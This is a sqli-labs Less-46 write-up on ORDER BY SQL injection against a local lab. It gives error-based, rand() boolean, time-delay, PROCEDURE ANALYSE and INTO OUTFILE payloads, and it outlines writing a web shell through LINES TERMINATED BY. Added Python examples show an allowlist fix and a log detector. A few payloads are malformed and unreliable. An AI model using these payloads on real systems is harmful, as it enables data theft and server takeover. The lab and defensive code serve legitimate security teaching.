Less-46
Starting with this level, we begin to look at injections in the ORDER BY clause.
The SQL statement for this level is `$sql = "SELECT * FROM users ORDER BY $id";` (the `sort` parameter is copied into `$id` unchanged).
Try `?sort=1 DESC` and `?sort=1 ASC`: the two return differently ordered results (descending versus ascending), which indicates that the parameter is injectable.
From the SQL statement above, our injection point is the argument of ORDER BY. Unlike an injection point inside a WHERE clause, a UNION cannot be used here. To see how ORDER BY can be injected, look first at the official MySQL documentation for SELECT.
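To make the fix side concrete, here is the Less-46 concatenation pattern next to an allowlist-based builder. This is an added example, not code from sqli-labs; the table rows are constructed, and SQLite stands in for MySQL, so the MySQL-specific payloads from this write-up are only shown being kept out of the SQL text, not executed. ORDER BY is a case where prepared statements alone do not help, because a column name or sort direction cannot be bound as a value; the parameter has to be mapped onto fixed names instead.

```python
"""Added example (not from sqli-labs): ORDER BY built by concatenation, as in
Less-46, next to an allowlist-based builder. SQLite stands in for MySQL."""
import re
import sqlite3

# Constructed sample rows standing in for the lab's users table.
ROWS = [(1, "alice", "pw-a"), (2, "bob", "pw-b"), (3, "carol", "pw-c")]


def build_vulnerable(sort_param: str) -> str:
    """The lab's pattern: the request parameter lands in the SQL text as-is."""
    return f"SELECT * FROM users ORDER BY {sort_param}"


# Hardened form: the parameter only selects from a fixed set of column names
# and directions; user-supplied text is never copied into the statement.
COLUMNS = ("id", "username", "password")          # ?sort=1..3 map onto these
SORT_SYNTAX = re.compile(r"\s*(\d+)(?:\s+(asc|desc))?\s*", re.IGNORECASE)


def build_safe(sort_param: str) -> str:
    m = SORT_SYNTAX.fullmatch(sort_param)
    if not m:
        raise ValueError("sort must be '<column number> [ASC|DESC]'")
    idx = int(m.group(1))
    if not 1 <= idx <= len(COLUMNS):
        raise ValueError("sort column number out of range")
    direction = (m.group(2) or "asc").upper()
    return f"SELECT * FROM users ORDER BY {COLUMNS[idx - 1]} {direction}"


def classify(sort_param: str) -> str:
    """'accepted' if the hardened builder produces SQL for it, else 'rejected'."""
    try:
        build_safe(sort_param)
        return "accepted"
    except ValueError:
        return "rejected"


def run(sql: str) -> list:
    """Execute a statement against an in-memory SQLite copy of the table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return con.execute(sql).fetchall()


if __name__ == "__main__":
    # The ASC/DESC probe from the write-up is legitimate input for both builders...
    print(run(build_safe("1 DESC")))
    # ...while the payload forms from the write-up only ever reach the SQL text
    # in the vulnerable builder.
    for p in ("rand(ascii(left(database(),1))=115)",
              "1 and sleep(5)",
              "1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)",
              '1 into outfile "test1.txt"'):
        print(f"{p!r}: vulnerable -> {build_vulnerable(p)!r}; hardened -> {classify(p)}")
```

The allowlist accepts the same `1 DESC` / `1 ASC` inputs the level is probed with, so the sorting feature keeps working; what changes is that the SQL string is assembled only from constants the application owns.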
Several of the parameters that may follow ORDER BY can be used for injection.
First of all:
(1) The number after ORDER BY as the injection point. That is, construct an expression after ORDER BY whose result is a number. We try:
http://127.0.0.1/sqli-labs/Less-46/?sort=right(version(),1)
No error, but changing right to left gives the same result, which shows that the numeric approach does not work here, so we consider Boolean conditions instead. At this point we can use error-based injection and time-based (delay) injection.
Here a parameter can be constructed directly after sort=. There are three forms:
① Add the injection statement directly: sort=(select ******)
② Use a function such as rand(): sort=rand(SQL statement)
PS: The point here is that rand(TRUE) and rand(FALSE) produce different orderings.
③ Use AND, for example: sort=1 and (SQL statement)
In each of these forms the SQL statement can use either error-based or time-based injection, so the statement can be constructed flexibly.
Error injection example
http://127.0.0.1/sqli-labs/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()))
In the example above, the error message reveals the current user name.
Next we use rand() for a demonstration, since as mentioned above rand(TRUE) and rand(FALSE) give different results.
http://127.0.0.1/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)
http://127.0.0.1/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=116)
Comparing the two result sets above, the orderings for rand(TRUE) and rand(FALSE) differ, so the Boolean-based injection is successful.
Delay injection example
http://127.0.0.1/sqli-labs/Less-46/?sort=(select if(substring(current,1,1)=char(), benchmark(50000000,md5('1')),null) from (select database() as current) as tb1)
http://127.0.0.1/sqllib/Less-46/?sort=1 and if(ascii(substr()(database())=116,0,sleep(5))
The two delay injection examples above show an obvious difference in response time. No screenshot is given here, since a picture cannot show the delay.
Injection statements can also be appended after sort=1 and; this is not demonstrated here.
- Injection via the PROCEDURE ANALYSE parameter
Using the PROCEDURE ANALYSE parameter, we can perform error-based injection. Note that a LIMIT clause may sit between ORDER BY and PROCEDURE ANALYSE, so in practice an injection point inside LIMIT can also be exploited through PROCEDURE ANALYSE.
An example:
http://127.0.0.1/sqli-labs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
- Exporting to a file with the INTO OUTFILE parameter
http://127.0.0.1/sqllib/less-46/?sort=1 into outfile "c:\\wamp\\www\\sqllib\\test1.txt"
This writes the query results into a file.
At this point, uploading a web shell by means of LINES TERMINATED BY can be considered:
into outfile "c:\\wamp\\www\\sqllib\\test1.txt" lines terminated by 0x (the web shell, converted to hexadecimal)
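The five forms covered in this write-up (a subquery in the sort parameter, rand(), `1 and ...`, PROCEDURE ANALYSE and INTO OUTFILE) all leave the `sort` parameter looking nothing like the `<number> [ASC|DESC]` the application expects, which is what a defender can key on in the access log. The following is an added example, not part of the original page: it parses constructed common-log-format lines (not captured from a real server), extracts `sort`, accepts values of the expected shape and tags the rest with the technique they resemble.

```python
"""Added example (not from the original page): triage access log lines for
ORDER BY injection attempts of the kinds shown for Less-46."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines; none are captured from a real server.
LOG_LINES = [
    '127.0.0.1 - - [10/Oct/2023:12:00:01 +0000] "GET /sqli-labs/Less-46/?sort=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:02 +0000] "GET /sqli-labs/Less-46/?sort=1%20DESC HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:03 +0000] "GET /sqli-labs/Less-46/?sort=rand(ASCII(Left(database(),1))=115) HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:04 +0000] "GET /sqli-labs/Less-46/?sort=1%20and%20sleep(5) HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:05 +0000] "GET /sqli-labs/Less-46/?sort=1%20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1) HTTP/1.1" 500 220',
    '127.0.0.1 - - [10/Oct/2023:12:00:06 +0000] "GET /sqli-labs/Less-46/?sort=1%20into%20outfile%20%22c:\\\\wamp\\\\www\\\\sqllib\\\\test1.txt%22 HTTP/1.1" 200 512',
]

# What the application legitimately accepts: a column number, optional direction.
EXPECTED = re.compile(r"\d+(\s+(asc|desc))?", re.IGNORECASE)

# Signatures for the forms described in the write-up (checked in this order).
TECHNIQUES = {
    "subquery in sort": re.compile(r"\bselect\b", re.IGNORECASE),
    "boolean/error via rand()": re.compile(r"\brand\s*\(", re.IGNORECASE),
    "time delay (sleep/benchmark)": re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE),
    "procedure analyse": re.compile(r"\bprocedure\s+analyse\b", re.IGNORECASE),
    "into outfile": re.compile(r"\binto\s+outfile\b", re.IGNORECASE),
}

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def sort_value(line: str):
    """Return the decoded `sort` query parameter of a log line, or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    values = query.get("sort")
    return values[0] if values else None


def triage(line: str):
    """Return (sort_value, [technique tags]); an empty tag list means benign.
    Returns None when the request carries no `sort` parameter."""
    value = sort_value(line)
    if value is None:
        return None
    if EXPECTED.fullmatch(value.strip()):
        return value, []
    tags = [name for name, rx in TECHNIQUES.items() if rx.search(value)]
    return value, tags or ["unexpected sort value"]


def triage_all(lines):
    """Indexes and findings for every line whose `sort` parameter is suspicious."""
    findings = []
    for i, line in enumerate(lines):
        result = triage(line)
        if result and result[1]:
            findings.append((i, result))
    return findings


if __name__ == "__main__":
    for i, (value, tags) in triage_all(LOG_LINES):
        print(f"line {i}: sort={value!r} -> {', '.join(tags)}")
```

The `EXPECTED` check does the real work: anything the builder on the server would reject is worth a look, and the technique tags only help prioritise. A value that matches none of the signatures still gets reported as unexpected rather than dropped, so new payload shapes are not silently accepted.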